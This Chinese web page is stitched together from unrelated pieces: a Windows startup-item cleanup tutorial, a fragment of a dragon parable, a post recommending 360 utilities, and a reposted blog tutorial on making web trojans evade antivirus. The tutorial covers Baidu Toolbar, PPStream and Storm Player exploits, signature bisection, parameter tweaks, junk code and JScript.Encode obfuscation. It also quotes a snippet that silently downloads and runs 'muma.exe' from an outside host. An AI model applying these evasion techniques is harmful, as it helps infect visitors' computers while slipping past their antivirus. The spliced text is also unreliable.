信大多數人在電腦的使用過程中,因為各種工作需求及日常娛樂的需要安裝了眾多的工具和娛樂軟件,而現在很多的軟件都是自動開啟開機自動啟動的,也就是說電腦一開機軟件就運行了,并且會常駐系統任務欄。一是影響了開機的速度;二是占用過多的系統資源導致電腦運行緩慢。
您是不是也是這種情況?開機以后各種軟件的登錄窗口。
點開屏幕右下角那個向上的小箭頭,發現各種軟件在扎堆集體蠶食您的系統資源?
今天我將列舉WIN XP、WIN 7、WIN 10 三個系統如何設置及精簡開機啟動項,讓您的電腦開機后清爽、干脆。(WIN8的啟動項設置與WIN 10差異不大,使用WIN 8系統的朋友參照WIN 10操作即可。 )
以下教程都是在無殺毒、無管家軟件的情況下操作的,大家也看到了我的系統內飾沒有安裝類管家和殺毒類軟件的。
WIN XP:
點擊開始鍵 - 點擊運行
輸入 MSCONFIG (系統配置實用程序)- 回車
在彈出的界面上方選擇啟動選項卡
列表中就是您電腦內設置為開機啟動的軟件列表
理論上來說是可以全部取消的,但是要根據您的實際使用需求,比如360、騰訊管家等的防護類軟件就需要保留,或者您需要開機啟動的軟件。根據您自身的需求來選擇那些軟件是不需要開機啟動的,把前面的 √ 取消然后點擊應用,再點擊關閉就可以了。
稍后系統會提示您重啟電腦,點擊確定重啟后就好了。
由于很多軟件的啟動項名稱都是英文標注,朋友們都不知道是什么軟件,也不知道如何下手,我大概列舉了一部分軟件的啟動項名稱希望能幫到大家。
殺毒防護類軟件:
avpcc.exe ------------是卡巴斯基Kaspersky反病毒套裝的一部分,用于保護你的計算機免受病毒和蠕蟲的攻擊;
popproxy ------------瑞星防火墻;
RavMon ------------ 瑞星殺毒軟件;
RavTimer------------ 瑞星殺毒軟件;
360tray-------------------------------------------360安全衛士;
Kingsoft AntiVirus (KavStart )-- 金山毒霸的啟動項;
Kingsoft PFW---------- 是金山殺毒軟件個人防火墻相啟動項;
KAVRun ------------ 金山毒霸啟動時加載的用戶進程信息;
McAfeeVirusScanService -----殺毒軟件McAfee Virus ;
RealTray ------------ Realplay的啟動項;
realsched------------是realplayer檢查網上有沒有這個軟件的更新而啟動 的服務。可去掉.但在每次運行realsched時就可能會再次出現;
TkBellExe------------ RealOnePlayer的啟動項 ;
Winampa------------ MP3播放器Winamp;
NDetect ------------ ICQ的啟動程序,該論壇有惡意程序,應禁止;
CnsMin -------------3721網站的中文域名;
stormset------------這個是暴風影音的設置程序,比如自動升級等功能。屬于后臺運行的程序,取消完全沒有問題;
MiniQQLive------------QQ直播;
Demon--------------虛擬光驅;
JrInt----------------- CPU降溫圣手。
系統功能類軟件:
ctfmon.exe------------是Microsoft Office產品套裝的一部分。它可以選擇用戶文字輸入程序和微軟Office XP語言條。這不是純粹的系統程序,但是如果終止它,可能會導致不可知的問題。輸入法會出現在屏幕右下角,建議不刪。
NvCpl -------------是顯卡桌面管理調節程序;
nvcpl.dll------------ 是NVIDIA顯示卡相關動態鏈接庫文件。可以停用;
nvmctray - nvmctray.dll ------- DLL文件信息是顯示卡相關文件。
internat.exe ------------輸入法指示器程序
LoadPowerProfile--------- Win98/Me電源管理
PCHealth ------------ WinMe系統自愈功能
ScanRegistry -----------啟動時檢查并備份注冊表
SchedulingAgent --------- 系統計劃任務程序
Synchronization Manager------ Win2000同步管理
SystemTray----------- 系統托盤,管理內存駐留程序
Taskbar Display Controls ----- 屏幕-屬性-設置-高級-在任務欄中顯示圖標
TaskMonitor -----------任務檢測程序,記錄使用軟件情況
*StateMgr ---------- WinMe系統還原
msmsgs Windows Messenger ---是微軟公司推出的一個在線聊天和即時通訊客戶端。
Rundll32 cmicnfg---------是32位的鏈接庫,使電腦能運行..dll類型的文件,建議不要禁用;
soundman.exe--------- 是Realtek聲卡相關程序。該進程在系統托盤駐留,用于進行快速訪問和診斷。可關掉.
igfxtray.exe ----------- 是intel顯卡配置和診斷程序,會在安裝intel 810芯片組的集成顯卡驅動時一起安裝。關掉試試.
hkcmd.exe------------此進程是主板上集成顯卡的一個驅動控制臺文件, 常和 igfxtray.exe 一起出現,如intel865G芯片集成的顯卡。但該命令常會被黑客或木馬利用,需要注意。可以禁用,不是病毒,但可能被病毒替代。
nwiz.exe-------------是NVIDIA nView控制面板在NVIDA顯卡驅動中被安裝,用于調整和設定。可停用.;
WIN 7:
WIN 7的操作基本上跟XP是一樣的,只是在點擊開始鍵后出現的WIN菜單與XP不同。
點擊開始鍵 - 直接在搜索欄內輸入 MSCONFIG ,上方會出現MSCONFIG的程序,選擇運行即可。
接下來的操作與XP一樣。
WIN 10:
WIN 8就簡單了很多。只需要在任務欄空白處點擊右鍵
選擇任務管理器
在彈出的界面上方選擇啟動選項卡
然后您就會看到那些程序是開機啟動的
接下來同樣根據您的需求來禁用您想要開機不啟動的軟件即可。
希望我的教程能幫到大家。
近一段時間,很多國內知名的應用程序都出現了很嚴重的安全漏洞,而這些漏洞的運用方法也都出奇地一致——網頁木馬。可是網頁木馬和木馬程序一樣,一經推出就會很快被殺毒軟件所查殺。關于木馬程序的免殺已經介紹過很多了,今天就來看看網頁木馬是如何進行免殺制作的。
一.百度搜索網頁木馬
百度搜霸漏洞是由于BaiduBar.dll ActiveX控件中存在一個可以供遠程代碼執行的高危漏洞。運行百度搜霸漏洞網頁木馬生成器來創建一個自己需要的網頁木馬文件。分別利用瑞星和卡巴斯基對這個文件進行查殺,發現目前只有瑞星可以對這個文件進行查殺。
現在我們就利用常見的源代碼折半法來進行文件特征碼的尋找井進行查殺,所謂源代碼折半法,就是把源代碼從中一分為二,接替來查看哪一部分代碼被殺,如果發現兩層以上的特征碼再將這段分開,然后依次類推縮小范圍,最終找到文件中特征碼的所在位置,這也是網頁木馬免殺最常用的檢測方法。
由于百度搜霸網頁木馬的代碼很少很清晰,因此制作免殺起來還是有一定的難度的,所以我們只能從文件代碼中間進行修改操作。舉個例子,比如說“( "http://www.weixanmanbu.com/cak.cab","muma .exe",0)”,這段代碼是網頁木馬先利用DloadDS()函數下載CAB文件,然后在本地將其轉化為可執行文件再運行,在這段代碼最后有一個參數0,它的作用就是讓下載的文件不顯示給用戶。我們只需要把參數0改為1,網頁木馬文件就可以起到免殺的效果了。不過問題也隨之而來了,改成1后網頁木馬會彈出一個提示窗口,這個樣子很容易被發現并引起用戶的懷疑。那應該怎么辦呢?其實操作起來很簡單。我們只需要將參數0改為00,就可以輕易的躲過瑞星殺毒軟件的檢測。
二.PPStream網頁木馬
PPStream網頁木馬是通過PPStream的堆棧溢出產生的。首先還是通過PPStream漏洞生成器來創建一個網頁木馬文件,接著通過金山毒霸對其進行查殺,毋庸置疑已經被查殺了。我們還是先通過源代碼折半法來確定特征碼的位置,經過測試發現特征碼處于<objeot id="ppc" Classid=”CLSID:5EC7C511-CDOF-42E6-830C-1BD9882F3458">這段中。其實制作過免殺網頁木馬的用戶一眼就可以看出,問題一定是在ppc這個參數里面,因為參數從來就是殺毒軟件特征碼的提取內容。我們將ppc改為duba,然后網頁木馬文件就免殺了。不過需要大家注意的是,這段代碼和后面的是相連的,因此只要使用ppc參數的,就需要改成duba才可以。這個方法對于其它的殺毒軟件,比如瑞星也可以起到免殺的效果。
三.暴風影音網頁木馬
暴風影音網頁木馬是由于暴風影音II中mps.dll組件多個緩沖區溢出漏洞造成的,也是近期非常熱門的一個軟件漏洞。創建好我們的網頁木馬后進仟查殺,發現很多殺毒軟件都能夠將其查殺。同樣通過路改參數就可以避過金山毒霸的查殺,但卻無法過瑞星和卡巴斯基。
我們找到memory=new Array();,接著在其下面添加一句google=memory。本來變量memory是直接轉向new Array()的,現在我們在中間添加了一句新的代碼,這樣就讓google先轉到變量memory,然后再從memory轉向new Array()。實際上就是讓代碼多走了一步路,這在程序中本來是不應該存在的,這么做就相當于在網頁代碼里而添加了一段花指令。保存修改后再查殺網頁木馬文件,發現已經通過了瑞星的檢測。
網頁木馬的免殺除了這種修改源代碼的方法外。還可以利用代碼加密的方法來進行免殺操作。網頁木馬的加密方法有很多,常用的就是微軟的JScript.Encode腳本來加密,當然用戶自己編寫加密函數效果會更好。現在同上這種在線進行JScript.Encode加密解密的網頁也有很多,只需要將網頁木馬源代碼粘貼在網頁的輸入框內,接著按“Encodc解密”按鈕就可以了。需要用戶注意的是,加密時應該只對腳本部分進行加密,不需要對<script language="">腳本標記進行加密,并且加密后腳本標記應該改為<script language="JScript.Encode">。
到此為止,關于網頁木馬免殺的相關內容就為大家介紹到這兒,從上面的介紹我們可以看到,網頁木馬免殺的方法相對于可執行文件來說還是非常有限的。不過用戶只需要利用好過有限的方法,就可以將網頁木馬隱形于眾多的殺毒軟件面前,當然這種方法也適用于ASP、PHP這樣的網頁木馬。
本文來自 危險漫步博客 轉載請注明;
本文地址:http://www.weixianmanbu.com/article/1143.html
條惡龍要求一個村莊每年都要給它獻祭女孩,這個村莊也每年都會有一個勇敢的少年去與惡龍搏斗,但是從沒有回來過。
有一年惡龍又讓村子給它獻祭女孩,一個少年帶著寶劍出發了。這時,村子里有人偷偷地跟在他的后面,想看看到底發生了什么。少年來到惡龍的巢穴,找到惡龍,并用寶劍殺死了惡龍,少年坐在惡龍的尸體上,看著龍穴里一地的金銀財寶,最終他的頭上長出了犄角,背后長出了翅膀,少年變成了惡龍。 《在緬甸尋找喬治·奧威爾》
對于360公司的風評,已然呈現兩極分化,網絡上各路大神恨不得“得而誅之”,但在生活中卻又隨處可見。
每當我推薦360的某款軟件,評論區總是會有諸如“太年輕”“看見360就關了”等評論,對于360的發家史,我在之前的文章中已經寫過了,在此摘錄一段:
“對于360瀏覽器的推薦,是之前最大的爭議點,很多人上來就開始指責,為什么用安全瀏覽器?當然也有很多年輕一點的同學并不知道360干了啥,現在的360產品也的確不能說不好用,那今天就讓我們細細地說一說。360公司創始人周鴻偉,在開設安全公司之前也有過原始資金積累的項目,那就是3721中文導航,他作為導航好不好用已經很難評判了,但他絕對是有史以來最瘋狂的流氓軟件,無論你技術水平高低,只要裝上3721,想卸載掉他,你也就只剩下重裝系統這一條路了,而3721的覆滅也是周鴻偉先生創辦的360殺毒軟件實現的;這里面沒有什么浪子回頭大義滅親,有的只是商業手段和市場需求,360用3721的覆滅奠定了自己國內一流免費殺毒軟件的地位,當然這都是后話了。”
但今天我推薦的360系列軟件,可能會與你印象中完全不同,一起來看一下吧~
注意,本次推薦的軟件均為個人版軟件,不包含企業用途的360產品。
360系統急救箱
360系統急救箱可以說是我用過的360系列軟件中最強的存在,多次從病毒木馬和流氓軟件手里拯救電腦,360急救箱可以在安全軟件無法啟動,甚至exe都無法執行的情況下啟動。
集成了常規查殺、MBR病毒查殺(鬼影)、系統設置恢復、系統文件修復等功能,在系統被病毒嚴重破壞的情況下都能進行修復, 尤其是其“無信任區”的特點,是2345等推廣軟件rootkit自動安裝的完美克星。
360衛士國際版(有廣告)
360衛士的國內版本,應該稱它為帶垃圾清理的殺毒軟件,還是稱為帶開機啟動項管理的小工具集合呢?龐大、緩慢,已然成為XX衛士的標志,或許你可以試試360衛士的國際版,只保留了最核心的殺毒、加速、垃圾清理功能,又具備360衛士的完整病毒查殺能力,是個不錯的選擇。
360壓縮國際版
國內的壓縮軟件,有一個算一個,都是流氓頭子,如好壓、快壓、winrar國內版、萬能壓縮,在此背景下,360壓縮竟然成為了一股清流,全格式支持、支持壓縮包直接瀏覽圖片、帶有云掃描功能,只是近幾個版本國內版開始彈廣告了。
而360壓縮的國際版360ZIP,功能完全相同且沒有任何廣告,值得一試。
360驅動大師
win10能夠自動安裝驅動,受沖擊最大的恐怕是驅動安裝類軟件,如果你最近用過驅動精靈,你會發現它第一時間不是給你安裝驅動,而是給你更改主頁???驅動人生則學習百度網盤搞起了限速會員制,的確,驅動安裝類軟件沒有什么好的盈利模式,如果非要用,我選擇360驅動大師。
360極速瀏覽器&瀏覽器醫生(有廣告)
360極速瀏覽器是由原世界之窗團隊開發,在IE兼容模式上,能夠選擇要兼容的IE版本,更新快,切換內核方便。瀏覽器內按F1可以喚出瀏覽器醫生,能夠快速檢測上網遇到的問題,方便用戶使用。
最后,說一下廣告
對于軟件廣告,我并不是非常排斥,既然免費使用了軟件,看一看廣告給開發者增加一下收入未嘗不可;國內軟件環境非常不好,大公司有投資者支持,可以做到少廣告甚至無廣告,小公司只能靠做全家桶多彈幾個廣告,個人開發者則只能靠捐贈存活,用愛不能發電。曾經有很多優秀的軟件,都是在開發者無法支撐后關閉或者賣掉,如快車下載、暴風影音、天天靜聽、世界之窗瀏覽器、realpalyer等,很多PE里優秀的小工具我們連作者是誰都不知道,再看著年收入百億的視頻網站還要給會員看專屬廣告,或許只能說一句:“理解萬歲”